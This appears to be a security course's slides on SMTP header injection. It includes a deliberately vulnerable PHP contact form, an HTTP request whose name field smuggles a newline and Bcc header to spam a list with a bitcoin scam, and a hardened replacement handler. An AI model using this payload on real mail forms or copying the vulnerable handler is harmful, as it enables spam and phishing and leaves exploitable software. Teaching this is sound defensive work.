Injection Attacks: The Complete 2020 Guide

SMTP Header Injections - Overview

SMTP

Simple Mail Transfer Protocol

To: eric@example.com
From: admin@cybr.com
Reply-To: christophe@cybr.com
Subject: Example subject

MAIL FROM:<admin@cybr.com>

RCPT TO:<eric@example.com>

DATA
  
  
To: eric@example.com
From: admin@cybr.com
Reply-To: christophe@cybr.com
Subject: Example subject

MAIL FROM:<admin@cybr.com>

RCPT TO:<eric@example.com>
  
RCPT TO:<large-spam-list@example.com>
  
DATA
  
  
\nbcc: large-spam-list@example.com

SMTP Header Injections Impact

  • Send copies of emails to a 3rd party
  • Spam emails
  • Deliver phishing attacks that look legitimate
  • Alter the content of emails
  • Potentially attach viruses and malware to emails

Overview of SMTP

  • MAIL FROM - who the email is from
  • RCPT TO - sets the recipient
  • DATA - begins the email payload (email headers + message body)

Email Headers

  • From - displays the sender address (could be different than MAIL FROM)
  • To - displays the recipient (could be different than RCPT TO)

> MAIL FROM:<admin@cybr.com>
< 250 Ok
> RCPT TO:<eric@example.com>
< 250 Ok
> RCPT TO:<shawna@example.com>
< 250 Ok
> DATA
< 354 End data with <CR><LF>.<CR><LF>
> From: "Christophe Limpalair" <christophe@cybr.com>
> To: Cybr friends <cybr-friends@cybr.com>
> Date: Tue, 1 August 2020 16:02:43 -0500
> Subject: Important email to read!
> 
> Hello all,
> This is a very important email used to demonstrate what an SMTP dialogue looks like.
> Your friend,
> Christophe
> .
< 250 Ok
     
     

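<?php
// Every field below is taken from the request without validation.
$name = $_POST['name'];
$replyTo = $_POST['replyTo'];
$message = $_POST['message'];

$to = 'support@localhost';
$subject = $_POST['subject'];

// Vulnerable: $name and $replyTo are concatenated into the header block,
// so a line break in either value starts a new header line.
$headers = "From: $name \n" .
  "Reply-To: $replyTo";

mail($to, $subject, $message, $headers);
?>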


POST /contact.php HTTP/1.1
Host: cybr.com

name=Christophe&replyTo=christophe@cybr.com&message=Reaching out to discuss...&subject=Important information


POST /contact.php HTTP/1.1
Host: cybr.com

name=Christophe\nbcc: large-spam-list@example.com&replyTo=christophe@temp-mail.com&message=I feel generous today and will match the amount of bitcoin that you send me, but only if you are the first 20! Donate here: fake-link.com&subject=Free Bitcoin! Hurry!

> MAIL FROM:<mail-service@cybr.com>
< 250 Ok
> RCPT TO:<large-spam-list@example.com>
< 250 Ok
> RCPT TO:<christophe@temp-mail.com>
< 250 Ok
> DATA
< 354 End data with <CR><LF>.<CR><LF>
> From: "Christophe" <christophe@temp-mail.com>
> To: Support <support@cybr.com>
> Date: Tue, 1 August 2020 16:02:43 -0500
> Subject: Free Bitcoin! Hurry
> 
> I feel generous today and will match the amount of bitcoin that you send me, but only if you are the first 20! Donate here: fake-link.com
> .
< 250 Ok
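
A hardened counterpart to the contact.php handler above, as an added example that is not part of the original slides: it rejects CR, LF and NUL in every value that reaches a header and validates the Reply-To address. The helper names and the fixed noreply@localhost From address are assumptions.

```php
<?php
// Added example: hardened version of the contact handler; helper names are hypothetical.

// Reject CR, LF and NUL: a line break is what lets a value start a new header.
function assertSingleLine(string $value, string $field): string
{
    if (preg_match('/[\r\n\0]/', $value)) {
        throw new InvalidArgumentException("control character in $field");
    }
    return trim($value);
}

// Reply-To must be exactly one syntactically valid address.
function assertEmail(string $value, string $field): string
{
    $value = assertSingleLine($value, $field);
    if (filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException("invalid address in $field");
    }
    return $value;
}

function buildHeaders(string $name, string $replyTo): string
{
    // Escape backslash and quote so the name stays inside the quoted display string.
    $display = addcslashes(assertSingleLine($name, 'name'), "\"\\");
    $replyTo = assertEmail($replyTo, 'replyTo');
    // Assumption: From is a fixed site-owned address, never visitor input.
    return "From: \"$display\" <noreply@localhost>\r\n" . "Reply-To: $replyTo";
}

if (PHP_SAPI === 'cli') {
    // Constructed input: the name payload from the request shown above.
    try {
        buildHeaders("Christophe\nbcc: large-spam-list@example.com", 'christophe@temp-mail.com');
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
    echo buildHeaders('Christophe', 'christophe@cybr.com'), "\n";
} elseif (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    try {
        $headers = buildHeaders($_POST['name'] ?? '', $_POST['replyTo'] ?? '');
        $subject = assertSingleLine($_POST['subject'] ?? '', 'subject');
        mail('support@localhost', $subject, $_POST['message'] ?? '', $headers);
    } catch (InvalidArgumentException | TypeError $e) {
        http_response_code(400); // bad field or non-string (array) parameter
    }
}
```

Run from the command line, the script exercises only the header builder and sends no mail.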

IMAP Injections

SMTP Header Injections Overview

By Christophe Limpalair
